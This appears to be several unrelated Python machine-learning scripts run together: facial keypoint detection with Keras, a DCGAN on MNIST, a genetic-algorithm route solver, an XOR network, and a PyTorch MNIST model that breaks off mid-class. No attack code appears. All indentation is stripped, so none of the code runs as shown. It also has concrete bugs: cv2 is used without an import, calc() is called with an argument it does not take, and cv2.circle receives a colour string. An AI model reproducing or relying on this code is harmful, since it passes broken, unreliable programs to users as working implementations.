import numpy as np
import matplotlib.pyplot as plt
import sys
from models import create_model
from parameters import *
from utils import normalize_image
def untransform(keypoints):
return keypoints * 50 + 100
def get_single_prediction(model, image):
image = np.expand_dims(image, axis=0)
keypoints = model.predict(image)[0]
return keypoints.reshape(*OUTPUT_SHAPE)
def show_keypoints(image, predicted_keypoints, true_keypoints=None):
predicted_keypoints = untransform(predicted_keypoints)
plt.imshow(np.squeeze(image), cmap="gray")
plt.scatter(predicted_keypoints[:, 0], predicted_keypoints[:, 1], s=20, marker=".", c="m")
if true_keypoints is not None:
true_keypoints = untransform(true_keypoints)
plt.scatter(true_keypoints[:, 0], true_keypoints[:, 1], s=20, marker=".", c="g")
plt.show()
image = cv2.imread(sys.argv[1])
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# # construct the model
model = create_model((*IMAGE_SIZE, 1), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
model.load_weights("results/model_smoothl1.h5")
face_cascade = cv2.CascadeClassifier("haarcascade_frontalface_default.xml")
# get all the faces in the image
faces = face_cascade.detectMultiScale(image, 1.2, 2)
for (x, y, w, h) in faces:
cv2.rectangle(image, (x, y), (x+w, y+h), (255, 0, 0), 3)
face_image = image.copy()[y: y+h, x: x+w]
face_image = normalize_image(face_image)
keypoints = get_single_prediction(model, face_image)
show_keypoints(face_image, keypoints)
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import cv2
from models import create_model
from parameters import IMAGE_SIZE, BATCH_SIZE, EPOCHS, OUTPUT_SHAPE, training_file, testing_file
from utils import load_data, resize_image, normalize_keypoints, normalize_image
def get_single_prediction(model, image):
image = np.expand_dims(image, axis=0)
keypoints = model.predict(image)[0]
return keypoints.reshape(*OUTPUT_SHAPE)
def get_predictions(model, X):
predicted_keypoints = model.predict(X)
predicted_keypoints = predicted_keypoints.reshape(-1, *OUTPUT_SHAPE)
return predicted_keypoints
def show_keypoints(image, predicted_keypoints, true_keypoints=None):
predicted_keypoints = untransform(predicted_keypoints)
plt.imshow(image, cmap="gray")
plt.scatter(predicted_keypoints[:, 0], predicted_keypoints[:, 1], s=20, marker=".", c="m")
if true_keypoints is not None:
true_keypoints = untransform(true_keypoints)
plt.scatter(true_keypoints[:, 0], true_keypoints[:, 1], s=20, marker=".", c="g")
plt.show()
def show_keypoints_cv2(image, predicted_keypoints, true_keypoints=None):
for keypoint in predicted_keypoints:
image = cv2.circle(image, (keypoint[0], keypoint[1]), 2, color=2)
if true_keypoints is not None:
image = cv2.circle(image, (true_keypoints[:, 0], true_keypoints[:, 1]), 2, color="green")
return image
def untransform(keypoints):
return keypoints * 224
# construct the model
model = create_model((*IMAGE_SIZE, 1), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
model.load_weights("results/model_smoothl1_different-scaling.h5")
# X_test, y_test = load_data(testing_file)
# y_test = y_test.reshape(-1, *OUTPUT_SHAPE)
cap = cv2.VideoCapture(0)
while True:
_, frame = cap.read()
# make a copy of the original image
image = frame.copy()
image = normalize_image(image)
keypoints = get_single_prediction(model, image)
print(keypoints[0])
keypoints = untransform(keypoints)
# w, h = frame.shape[:2]
# keypoints = (keypoints * [frame.shape[0] / image.shape[0], frame.shape[1] / image.shape[1]]).astype("int16")
# frame = show_keypoints_cv2(frame, keypoints)
image = show_keypoints_cv2(image, keypoints)
cv2.imshow("frame", image)
if cv2.waitKey(1) == ord("q"):
break
cv2.destroyAllWindows()
cap.release()
from tensorflow.keras.models import Sequential, Model
from tensorflow.keras.layers import Dense, Activation, Conv2D, MaxPooling2D, Dropout, Flatten
from tensorflow.keras.applications import MobileNetV2
import tensorflow as tf
import tensorflow.keras.backend as K
def smoothL1(y_true, y_pred):
HUBER_DELTA = 0.5
x = K.abs(y_true - y_pred)
x = K.switch(x < HUBER_DELTA, 0.5 * x ** 2, HUBER_DELTA * (x - 0.5 * HUBER_DELTA))
return K.sum(x)
def create_model(input_shape, output_shape):
# building the model
model = Sequential()
model.add(Conv2D(filters=32, kernel_size=(5, 5), padding="same", input_shape=input_shape))
model.add(Activation("relu"))
model.add(Conv2D(filters=32, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
# model.add(Dropout(0.25))
model.add(Conv2D(filters=64, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(Conv2D(filters=64, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
# model.add(Dropout(0.25))
model.add(Conv2D(filters=128, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(Conv2D(filters=128, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
# model.add(Dropout(0.25))
# model.add(Conv2D(filters=256, kernel_size=(5, 5), padding="same"))
# model.add(Activation("relu"))
# model.add(Conv2D(filters=256, kernel_size=(5, 5), padding="same"))
# model.add(Activation("relu"))
# model.add(MaxPooling2D(pool_size=(2, 2)))
# # model.add(Dropout(0.25))
# flattening the convolutions
model.add(Flatten())
# fully-connected layers
model.add(Dense(256))
model.add(Activation("relu"))
model.add(Dropout(0.5))
model.add(Dense(output_shape, activation="linear"))
# print the summary of the model architecture
model.summary()
# training the model using rmsprop optimizer
# model.compile(loss="mean_squared_error", optimizer="adam", metrics=["mean_absolute_error"])
model.compile(loss=smoothL1, optimizer="adam", metrics=["mean_absolute_error"])
return model
def create_mobilenet_model(input_shape, output_shape):
model = MobileNetV2(input_shape=input_shape)
# remove the last layer
model.layers.pop()
# freeze all the weights of the model except for the last 4 layers
for layer in model.layers[:-4]:
layer.trainable = False
# construct our output dense layer
output = Dense(output_shape, activation="linear")
# connect it to the model
output = output(model.layers[-1].output)
model = Model(inputs=model.inputs, outputs=output)
model.summary()
# training the model using adam optimizer
# model.compile(loss="mean_squared_error", optimizer="adam", metrics=["mean_absolute_error"])
model.compile(loss=smoothL1, optimizer="adam", metrics=["mean_absolute_error"])
return model
IMAGE_SIZE = (224, 224)
OUTPUT_SHAPE = (68, 2)
BATCH_SIZE = 20
EPOCHS = 30
training_file = "data/training_frames_keypoints.csv"
testing_file = "data/test_frames_keypoints.csv"
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from models import create_model, create_mobilenet_model
from parameters import IMAGE_SIZE, BATCH_SIZE, EPOCHS, OUTPUT_SHAPE, training_file, testing_file
from utils import load_data
def get_predictions(model, X):
predicted_keypoints = model.predict(X)
predicted_keypoints = predicted_keypoints.reshape(-1, *OUTPUT_SHAPE)
return predicted_keypoints
def show_keypoints(image, predicted_keypoints, true_keypoints):
predicted_keypoints = untransform(predicted_keypoints)
true_keypoints = untransform(true_keypoints)
plt.imshow(np.squeeze(image), cmap="gray")
plt.scatter(predicted_keypoints[:, 0], predicted_keypoints[:, 1], s=20, marker=".", c="m")
plt.scatter(true_keypoints[:, 0], true_keypoints[:, 1], s=20, marker=".", c="g")
plt.show()
def untransform(keypoints):
return keypoints *224
# # construct the model
model = create_mobilenet_model((*IMAGE_SIZE, 3), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
model.load_weights("results/model_smoothl1_mobilenet_crop.h5")
X_test, y_test = load_data(testing_file)
y_test = y_test.reshape(-1, *OUTPUT_SHAPE)
y_pred = get_predictions(model, X_test)
print(y_pred[0])
print(y_pred.shape)
print(y_test.shape)
print(X_test.shape)
for i in range(50):
show_keypoints(X_test[i+400], y_pred[i+400], y_test[i+400])
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.preprocessing import MinMaxScaler
from tqdm import tqdm
# from tensorflow.keras.layers import Conv2D, Dense, MaxPooling2D
from tensorflow.keras.callbacks import TensorBoard, ModelCheckpoint
import os
from models import create_model, create_mobilenet_model
from parameters import IMAGE_SIZE, BATCH_SIZE, EPOCHS, OUTPUT_SHAPE, training_file, testing_file
from utils import load_data
# # read the training dataframe
# training_df = pd.read_csv("data/training_frames_keypoints.csv")
# # print the number of images available in the training dataset
# print("Number of images in training set:", training_df.shape[0])
def show_keypoints(image, key_points):
# show the image
plt.imshow(image)
# use scatter() to plot the keypoints in the faces
plt.scatter(key_points[:, 0], key_points[:, 1], s=20, marker=".")
plt.show()
# show an example image
# n = 124
# image_name = training_df.iloc[n, 0]
# keypoints = training_df.iloc[n, 1:].values.reshape(-1, 2)
# show_keypoints(mpimg.imread(os.path.join("data", "training", image_name)), key_points=keypoints)
model_name = "model_smoothl1_mobilenet_crop"
# construct the model
model = create_mobilenet_model((*IMAGE_SIZE, 3), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
# model.load_weights("results/model3.h5")
X_train, y_train = load_data(training_file, to_gray=False)
X_test, y_test = load_data(testing_file, to_gray=False)
if not os.path.isdir("results"):
os.mkdir("results")
tensorboard = TensorBoard(log_dir=os.path.join("logs", model_name))
# checkpoint = ModelCheckpoint(os.path.join("results", model_name), save_best_only=True, verbose=1)
history = model.fit(X_train, y_train,
batch_size=BATCH_SIZE,
epochs=EPOCHS,
validation_data=(X_test, y_test),
# callbacks=[tensorboard, checkpoint],
callbacks=[tensorboard],
verbose=1)
model.save("results/" + model_name + ".h5")
import numpy as np
import pandas as pd
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import cv2
from tqdm import tqdm
import os
from parameters import IMAGE_SIZE, OUTPUT_SHAPE
def show_keypoints(image, predicted_keypoints, true_keypoints=None):
# predicted_keypoints = untransform(predicted_keypoints)
plt.imshow(image, cmap="gray")
plt.scatter(predicted_keypoints[:, 0], predicted_keypoints[:, 1], s=20, marker=".", c="m")
if true_keypoints is not None:
# true_keypoints = untransform(true_keypoints)
plt.scatter(true_keypoints[:, 0], true_keypoints[:, 1], s=20, marker=".", c="g")
plt.show()
def resize_image(image, image_size):
return cv2.resize(image, image_size)
def random_crop(image, keypoints):
h, w = image.shape[:2]
new_h, new_w = IMAGE_SIZE
keypoints = keypoints.reshape(-1, 2)
try:
top = np.random.randint(0, h - new_h)
left = np.random.randint(0, w - new_w)
except ValueError:
return image, keypoints
image = image[top: top + new_h, left: left + new_w]
keypoints = keypoints - [left, top]
return image, keypoints
def normalize_image(image, to_gray=True):
if image.shape[2] == 4:
# if the image has an alpha color channel (opacity)
# let's just remove it
image = image[:, :, :3]
# get the height & width of image
h, w = image.shape[:2]
new_h, new_w = IMAGE_SIZE
new_h, new_w = int(new_h), int(new_w)
# scaling the image to that IMAGE_SIZE
# image = cv2.resize(image, (new_w, new_h))
image = resize_image(image, (new_w, new_h))
if to_gray:
# convert image to grayscale
image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
# normalizing pixels from the range [0, 255] to [0, 1]
image = image / 255.0
if to_gray:
image = np.expand_dims(image, axis=2)
return image
def normalize_keypoints(image, keypoints):
# get the height & width of image
h, w = image.shape[:2]
# reshape to coordinates (x, y)
# i.e converting a vector of (136,) to the 2D array (68, 2)
new_h, new_w = IMAGE_SIZE
new_h, new_w = int(new_h), int(new_w)
keypoints = keypoints.reshape(-1, 2)
# scale the keypoints also
keypoints = keypoints * [new_w / w, new_h / h]
keypoints = keypoints.reshape(-1)
# normalizing keypoints from [0, IMAGE_SIZE] to [0, 1] (experimental)
keypoints = keypoints / 224
# keypoints = (keypoints - 100) / 50
return keypoints
def normalize(image, keypoints, to_gray=True):
image, keypoints = random_crop(image, keypoints)
return normalize_image(image, to_gray=to_gray), normalize_keypoints(image, keypoints)
def load_data(csv_file, to_gray=True):
# read the training dataframe
df = pd.read_csv(csv_file)
all_keypoints = np.array(df.iloc[:, 1:])
image_names = list(df.iloc[:, 0])
# load images
X, y = [], []
X = np.zeros((len(image_names), *IMAGE_SIZE, 3), dtype="float32")
y = np.zeros((len(image_names), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1]))
for i, (image_name, keypoints) in enumerate(zip(tqdm(image_names, "Loading " + os.path.basename(csv_file)), all_keypoints)):
image = mpimg.imread(os.path.join("data", "training", image_name))
image, keypoints = normalize(image, keypoints, to_gray=to_gray)
X[i] = image
y[i] = keypoints
return X, y
"""
DCGAN on MNIST using Keras
"""
# to use CPU
import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
import numpy as np
import matplotlib.pyplot as plt
import tqdm
import glob
# from tensorflow.examples.tutorials.mnist import input_data
from keras.models import Sequential
from keras.layers import Dense, Activation, Flatten, Reshape
from keras.layers import Conv2D, Conv2DTranspose, UpSampling2D
from keras.layers import LeakyReLU, Dropout, BatchNormalization
from keras.optimizers import Adam, RMSprop
from keras.datasets import mnist
class GAN:
def __init__(self, img_x=28, img_y=28, img_z=1):
self.img_x = img_x
self.img_y = img_y
self.img_z = img_z
self.D = None # discriminator
self.G = None # generator
self.AM = None # adversarial model
self.DM = None # discriminator model
def discriminator(self):
if self.D:
return self.D
self.D = Sequential()
depth = 64
dropout = 0.4
input_shape = (self.img_x, self.img_y, self.img_z)
self.D.add(Conv2D(depth, 5, strides=2, input_shape=input_shape, padding="same"))
self.D.add(LeakyReLU(0.2))
self.D.add(Dropout(dropout))
self.D.add(Conv2D(depth*2, 5, strides=2, padding="same"))
self.D.add(LeakyReLU(0.2))
self.D.add(Dropout(dropout))
self.D.add(Conv2D(depth*4, 5, strides=2, padding="same"))
self.D.add(LeakyReLU(0.2))
self.D.add(Dropout(dropout))
self.D.add(Conv2D(depth*8, 5, strides=1, padding="same"))
self.D.add(LeakyReLU(0.2))
self.D.add(Dropout(dropout))
# convert to 1 dimension
self.D.add(Flatten())
self.D.add(Dense(1, activation="sigmoid"))
print("="*50, "Discriminator", "="*50)
self.D.summary()
return self.D
def generator(self):
if self.G:
return self.G
self.G = Sequential()
dropout = 0.4
# covnerting from 100 vector noise to dim x dim x depth
# (100,) to (7, 7, 256)
depth = 64 * 4
dim = 7
self.G.add(Dense(dim*dim*depth, input_dim=100))
self.G.add(BatchNormalization(momentum=0.9))
self.G.add(Activation("relu"))
self.G.add(Reshape((dim, dim, depth)))
self.G.add(Dropout(dropout))
# upsampling to (14, 14, 128)
self.G.add(UpSampling2D())
self.G.add(Conv2DTranspose(depth // 2, 5, padding="same"))
self.G.add(BatchNormalization(momentum=0.9))
self.G.add(Activation("relu"))
self.G.add(Dropout(dropout))
# up to (28, 28, 64)
self.G.add(UpSampling2D())
self.G.add(Conv2DTranspose(depth // 4, 5, padding="same"))
self.G.add(BatchNormalization(momentum=0.9))
self.G.add(Activation("relu"))
self.G.add(Dropout(dropout))
# to (28, 28, 32)
self.G.add(Conv2DTranspose(depth // 8, 5, padding="same"))
self.G.add(BatchNormalization(momentum=0.9))
self.G.add(Activation("relu"))
self.G.add(Dropout(dropout))
# to (28, 28, 1) (img)
self.G.add(Conv2DTranspose(1, 5, padding="same"))
self.G.add(Activation("sigmoid"))
print("="*50, "Generator", "="*50)
self.G.summary()
return self.G
def discriminator_model(self):
if self.DM:
return self.DM
# optimizer = RMSprop(lr=0.001, decay=6e-8)
optimizer = Adam(0.0002, 0.5)
self.DM = Sequential()
self.DM.add(self.discriminator())
self.DM.compile(loss="binary_crossentropy", optimizer=optimizer, metrics=["accuracy"])
return self.DM
def adversarial_model(self):
if self.AM:
return self.AM
# optimizer = RMSprop(lr=0.001, decay=3e-8)
optimizer = Adam(0.0002, 0.5)
self.AM = Sequential()
self.AM.add(self.generator())
self.AM.add(self.discriminator())
self.AM.compile(loss="binary_crossentropy", optimizer=optimizer, metrics=["accuracy"])
return self.AM
class MNIST:
def __init__(self):
self.img_x = 28
self.img_y = 28
self.img_z = 1
self.steps = 0
self.load_data()
self.create_models()
# used image indices
self._used_indices = set()
def load_data(self):
(self.X_train, self.y_train), (self.X_test, self.y_test) = mnist.load_data()
# reshape to (num_samples, 28, 28 , 1)
self.X_train = np.expand_dims(self.X_train, axis=-1)
self.X_test = np.expand_dims(self.X_test, axis=-1)
def create_models(self):
self.GAN = GAN()
self.discriminator = self.GAN.discriminator_model()
self.adversarial = self.GAN.adversarial_model()
self.generator = self.GAN.generator()
discriminators = glob.glob("discriminator_*.h5")
generators = glob.glob("generator_*.h5")
adversarial = glob.glob("adversarial_*.h5")
if len(discriminators) != 0:
print("[+] Found a discriminator ! Loading weights ...")
self.discriminator.load_weights(discriminators[0])
if len(generators) != 0:
print("[+] Found a generator ! Loading weights ...")
self.generator.load_weights(generators[0])
if len(adversarial) != 0:
print("[+] Found an adversarial model ! Loading weights ...")
self.steps = int(adversarial[0].replace("adversarial_", "").replace(".h5", ""))
self.adversarial.load_weights(adversarial[0])
def get_unique_random(self, batch_size=256):
indices = np.random.randint(0, self.X_train.shape[0], size=batch_size)
# in_used_indices = np.any([i in indices for i in self._used_indices])
# while in_used_indices:
# indices = np.random.randint(0, self.X_train.shape[0], size=batch_size)
# in_used_indices = np.any([i in indices for i in self._used_indices])
# self._used_indices |= set(indices)
# if len(self._used_indices) > self.X_train.shape[0] // 2:
# if used indices is more than half of training samples, clear it
# that is to enforce it to train at least more than half of the dataset uniquely
# self._used_indices.clear()
return indices
def train(self, train_steps=2000, batch_size=256, save_interval=0):
noise_input = None
steps = tqdm.tqdm(list(range(self.steps, train_steps)))
fake = np.zeros((batch_size, 1))
real = np.ones((batch_size, 1))
for i in steps:
real_images = self.X_train[self.get_unique_random(batch_size)]
# noise = np.random.uniform(-1.0, 1.0, size=(batch_size, 100))
noise = np.random.normal(size=(batch_size, 100))
fake_images = self.generator.predict(noise)
# get 256 real images and 256 fake images
d_loss_real = self.discriminator.train_on_batch(real_images, real)
d_loss_fake = self.discriminator.train_on_batch(fake_images, fake)
d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)
# X = np.concatenate((real_images, fake_images))
# y = np.zeros((2*batch_size, 1))
# 0 for fake and 1 for real
# y[:batch_size, :] = 1
# shuffle
# shuffle_in_unison(X, y)
# d_loss = self.discriminator.train_on_batch(X, y)
# y = np.ones((batch_size, 1))
# noise = np.random.uniform(-1.0, 1.0, size=(batch_size, 100))
# fool the adversarial, telling him everything is real
a_loss = self.adversarial.train_on_batch(noise, real)
log_msg = f"[D loss: {d_loss[0]:.6f}, D acc: {d_loss[1]:.6f} | A loss: {a_loss[0]:.6f}, A acc: {a_loss[1]:.6f}]"
steps.set_description(log_msg)
if save_interval > 0:
noise_input = np.random.uniform(low=-1, high=1.0, size=(16, 100))
if (i + 1) % save_interval == 0:
self.plot_images(save2file=True, samples=noise_input.shape[0], noise=noise_input, step=(i+1))
self.discriminator.save(f"discriminator_{i+1}.h5")
self.generator.save(f"generator_{i+1}.h5")
self.adversarial.save(f"adversarial_{i+1}.h5")
def plot_images(self, save2file=False, fake=True, samples=16, noise=None, step=0):
filename = "mnist_fake.png"
if fake:
if noise is None:
noise = np.random.uniform(-1.0, 1.0, size=(samples, 100))
else:
filename = f"mnist_{step}.png"
images = self.generator.predict(noise)
else:
i = np.random.randint(0, self.X_train.shape[0], samples)
images = self.X_train[i]
if noise is None:
filename = "mnist_real.png"
plt.figure(figsize=(10, 10))
for i in range(images.shape[0]):
plt.subplot(4, 4, i+1)
image = images[i]
image = np.reshape(image, (self.img_x, self.img_y))
plt.imshow(image, cmap="gray")
plt.axis("off")
plt.tight_layout()
if save2file:
plt.savefig(filename)
plt.close("all")
else:
plt.show()
# https://stackoverflow.com/questions/4601373/better-way-to-shuffle-two-numpy-arrays-in-unison
def shuffle_in_unison(a, b):
rng_state = np.random.get_state()
np.random.shuffle(a)
np.random.set_state(rng_state)
np.random.shuffle(b)
if __name__ == "__main__":
mnist_gan = MNIST()
mnist_gan.train(train_steps=10000, batch_size=256, save_interval=500)
mnist_gan.plot_images(fake=True, save2file=True)
mnist_gan.plot_images(fake=False, save2file=True)
import random
import numpy as np
import pandas as pd
import operator
import matplotlib.pyplot as plt
from threading import Event, Thread
class Individual:
def __init__(self, object):
self.object = object
def update(self, new):
self.object = new
def __repr__(self):
return self.object
def __str__(self):
return self.object
class GeneticAlgorithm:
"""General purpose genetic algorithm implementation"""
def __init__(self, individual, popsize, elite_size, mutation_rate, generations, fitness_func, plot=True, prn=True, animation_func=None):
self.individual = individual
self.popsize = popsize
self.elite_size = elite_size
self.mutation_rate = mutation_rate
self.generations = generations
if not callable(fitness_func):
raise TypeError("fitness_func must be a callable object.")
self.get_fitness = fitness_func
self.plot = plot
self.prn = prn
self.population = self._init_pop()
self.animate = animation_func
def calc(self):
"""Try to find the best individual.
This function returns (initial_individual, final_individual, """
sorted_pop = self.sortpop()
initial_route = self.population[sorted_pop[0][0]]
distance = 1 / sorted_pop[0][1]
progress = [ distance ]
if callable(self.animate):
self.plot = True
individual = Individual(initial_route)
stop_animation = Event()
self.animate(individual, progress, stop_animation, plot_conclusion=initial_route)
else:
self.plot = False
if self.prn:
print(f"Initial distance: {distance}")
try:
if self.plot:
for i in range(self.generations):
population = self.next_gen()
sorted_pop = self.sortpop()
distance = 1 / sorted_pop[0][1]
progress.append(distance)
if self.prn:
print(f"[Generation:{i}] Current distance: {distance}")
route = population[sorted_pop[0][0]]
individual.update(route)
else:
for i in range(self.generations):
population = self.next_gen()
distance = 1 / self.sortpop()[0][1]
if self.prn:
print(f"[Generation:{i}] Current distance: {distance}")
except KeyboardInterrupt:
pass
try:
stop_animation.set()
except NameError:
pass
final_route_index = self.sortpop()[0][0]
final_route = population[final_route_index]
if self.prn:
print("Final route:", final_route)
return initial_route, final_route, distance
def create_population(self):
return random.sample(self.individual, len(self.individual))
def _init_pop(self):
return [ self.create_population() for i in range(self.popsize) ]
def sortpop(self):
"""This function calculates the fitness of each individual in population
And returns a population sorted by its fitness in descending order"""
result = [ (i, self.get_fitness(individual)) for i, individual in enumerate(self.population) ]
return sorted(result, key=operator.itemgetter(1), reverse=True)
def selection(self):
sorted_pop = self.sortpop()
df = pd.DataFrame(np.array(sorted_pop), columns=["Index", "Fitness"])
df['cum_sum'] = df['Fitness'].cumsum()
df['cum_perc'] = 100 * df['cum_sum'] / df['Fitness'].sum()
result = [ sorted_pop[i][0] for i in range(self.elite_size) ]
for i in range(len(sorted_pop) - self.elite_size):
pick = random.random() * 100
for i in range(len(sorted_pop)):
if pick <= df['cum_perc'][i]:
result.append(sorted_pop[i][0])
break
return [ self.population[index] for index in result ]
def breed(self, parent1, parent2):
child1, child2 = [], []
gene_A = random.randint(0, len(parent1))
gene_B = random.randint(0, len(parent2))
start_gene = min(gene_A, gene_B)
end_gene = max(gene_A, gene_B)
for i in range(start_gene, end_gene):
child1.append(parent1[i])
child2 = [ item for item in parent2 if item not in child1 ]
return child1 + child2
def breed_population(self, selection):
pool = random.sample(selection, len(selection))
children = [selection[i] for i in range(self.elite_size)]
children.extend([self.breed(pool[i], pool[len(selection)-i-1]) for i in range(len(selection) - self.elite_size)])
return children
def mutate(self, individual):
individual_length = len(individual)
for swapped in range(individual_length):
if(random.random() < self.mutation_rate):
swap_with = random.randint(0, individual_length-1)
individual[swapped], individual[swap_with] = individual[swap_with], individual[swapped]
return individual
def mutate_population(self, children):
return [ self.mutate(individual) for individual in children ]
def next_gen(self):
selection = self.selection()
children = self.breed_population(selection)
self.population = self.mutate_population(children)
return self.population
from genetic import plt
from genetic import Individual
from threading import Thread
def plot_routes(initial_route, final_route):
_, ax = plt.subplots(nrows=1, ncols=2)
for col, route in zip(ax, [("Initial Route", initial_route), ("Final Route", final_route) ]):
col.title.set_text(route[0])
route = route[1]
for i, city in enumerate(route):
if i == 0:
col.text(city.x-5, city.y+5, "Start")
col.scatter(city.x, city.y, s=70, c='g')
else:
col.scatter(city.x, city.y, s=70, c='b')
col.plot([ city.x for city in route ], [city.y for city in route], c='r')
col.plot([route[-1].x, route[0].x], [route[-1].y, route[0].y], c='r')
plt.show()
def animate_progress(route, progress, stop_animation, plot_conclusion=None):
def animate():
nonlocal route
_, ax1 = plt.subplots(nrows=1, ncols=2)
while True:
if isinstance(route, Individual):
target = route.object
ax1[0].clear()
ax1[1].clear()
# current routes and cities
ax1[0].title.set_text("Current routes")
for i, city in enumerate(target):
if i == 0:
ax1[0].text(city.x-5, city.y+5, "Start")
ax1[0].scatter(city.x, city.y, s=70, c='g')
else:
ax1[0].scatter(city.x, city.y, s=70, c='b')
ax1[0].plot([ city.x for city in target ], [city.y for city in target], c='r')
ax1[0].plot([target[-1].x, target[0].x], [target[-1].y, target[0].y], c='r')
# current distance graph
ax1[1].title.set_text("Current distance")
ax1[1].plot(progress)
ax1[1].set_ylabel("Distance")
ax1[1].set_xlabel("Generation")
plt.pause(0.05)
if stop_animation.is_set():
break
plt.show()
if plot_conclusion:
initial_route = plot_conclusion
plot_routes(initial_route, target)
Thread(target=animate).start()
import matplotlib.pyplot as plt
import random
import numpy as np
import operator
from plots import animate_progress, plot_routes
class City:
def __init__(self, x, y):
self.x = x
self.y = y
def distance(self, city):
"""Returns distance between self city and city"""
x = abs(self.x - city.x)
y = abs(self.y - city.y)
return np.sqrt(x ** 2 + y ** 2)
def __sub__(self, city):
return self.distance(city)
def __repr__(self):
return f"({self.x}, {self.y})"
def __str__(self):
return self.__repr__()
def get_fitness(route):
def get_distance():
distance = 0
for i in range(len(route)):
from_city = route[i]
to_city = route[i+1] if i+1 < len(route) else route[0]
distance += (from_city - to_city)
return distance
return 1 / get_distance()
def load_cities():
return [ City(city[0], city[1]) for city in [(169, 20), (103, 24), (41, 9), (177, 76), (138, 173), (163, 108), (93, 34), (200, 84), (19, 184), (117, 176), (153, 30), (140, 29), (38, 108), (89, 183), (18, 4), (174, 38), (109, 169), (93, 23), (156, 10), (171, 27), (164, 91), (109, 194), (90, 169), (115, 37), (177, 93), (169, 20)] ]
def generate_cities(size):
cities = []
for i in range(size):
x = random.randint(0, 200)
y = random.randint(0, 200)
if 40 < x < 160:
if 0.5 <= random.random():
y = random.randint(0, 40)
else:
y = random.randint(160, 200)
elif 40 < y < 160:
if 0.5 <= random.random():
x = random.randint(0, 40)
else:
x = random.randint(160, 200)
cities.append(City(x, y))
return cities
def benchmark(cities):
popsizes = [60, 80, 100, 120, 140]
elite_sizes = [5, 10, 20, 30, 40]
mutation_rates = [0.02, 0.01, 0.005, 0.003, 0.001]
generations = 1200
iterations = len(popsizes) * len(elite_sizes) * len(mutation_rates)
iteration = 0
gens = {}
for popsize in popsizes:
for elite_size in elite_sizes:
for mutation_rate in mutation_rates:
iteration += 1
gen = GeneticAlgorithm(cities, popsize=popsize, elite_size=elite_size, mutation_rate=mutation_rate, generations=generations, fitness_func=get_fitness, prn=False)
initial_route, final_route, generation = gen.calc(ret=("generation", 755))
if generation == generations:
print(f"[{iteration}/{iterations}] (popsize={popsize}, elite_size={elite_size}, mutation_rate={mutation_rate}): could not reach the solution")
else:
print(f"[{iteration}/{iterations}] (popsize={popsize}, elite_size={elite_size}, mutation_rate={mutation_rate}): {generation} generations was enough")
if generation != generations:
gens[iteration] = generation
# reversed_gen = {v:k for k, v in gens.items()}
output = sorted(gens.items(), key=operator.itemgetter(1))
for i, gens in output:
print(f"Iteration: {i} generations: {gens}")
# [1] (popsize=60, elite_size=30, mutation_rate=0.001): 235 generations was enough
# [2] (popsize=80, elite_size=20, mutation_rate=0.001): 206 generations was enough
# [3] (popsize=100, elite_size=30, mutation_rate=0.001): 138 generations was enough
# [4] (popsize=120, elite_size=30, mutation_rate=0.002): 117 generations was enough
# [5] (popsize=140, elite_size=20, mutation_rate=0.003): 134 generations was enough
# The notes:
# 1.1 Increasing the mutation rate to higher rate, the curve will be inconsistent and it won't lead us to the optimal distance.
# 1.2 So we need to put it as small as 1% or lower
# 2. Elite size is likely to be about 30% or less of total population
# 3. Generations depends on the other parameters, can be a fixed number, or until we reach the optimal distance.
# 4.
if __name__ == "__main__":
from genetic import GeneticAlgorithm
cities = load_cities()
# cities = generate_cities(50)
# parameters
popsize = 120
elite_size = 30
mutation_rate = 0.1
generations = 400
gen = GeneticAlgorithm(cities, popsize=popsize, elite_size=elite_size, mutation_rate=mutation_rate, generations=generations, fitness_func=get_fitness, animation_func=animate_progress)
initial_route, final_route, distance = gen.calc()
import tensorflow as tf
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
import re
import numpy as np
import os
import time
import json
from glob import glob
from PIL import Image
import pickle
import numpy as np
from keras.utils import np_utils
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Activation
np.random.seed(19)
X = np.array([[0,0],[0,1],[1,0],[1,1]]).astype('float32')
y = np.array([[0],[1],[1],[0]]).astype('float32')
y = np_utils.to_categorical(y)
xor = Sequential()
# add required layers
xor.add(Dense(8, input_dim=2))
# hyperbolic tangent function to the first hidden layer ( 8 nodes )
xor.add(Activation("tanh"))
xor.add(Dense(8))
xor.add(Activation("relu"))
# output layer
xor.add(Dense(2))
# sigmoid function to the output layer ( final )
xor.add(Activation("sigmoid"))
# Cross-entropy error function
xor.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
# show the summary of the model
xor.summary()
xor.fit(X, y, epochs=400, verbose=1)
# accuray
score = xor.evaluate(X, y)
print(f"Accuracy: {score[-1]}")
# Checking the predictions
print("\nPredictions:")
print(xor.predict(X))
import torch
import torchvision
from torchvision import transforms, datasets
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import matplotlib.pyplot as plt
epochs = 3
batch_size = 64
# building the network now
class Net(nn.Module):
def __init__(self):
super().__init__()
# takes 28x28 images
self.fc1 = nn.Linear(28*28, 64)
self.fc2 = nn.Linear(64, 64)
self.fc3 = nn.Linear(64, 64)
self.fc4 = nn.Linear(64, 10)
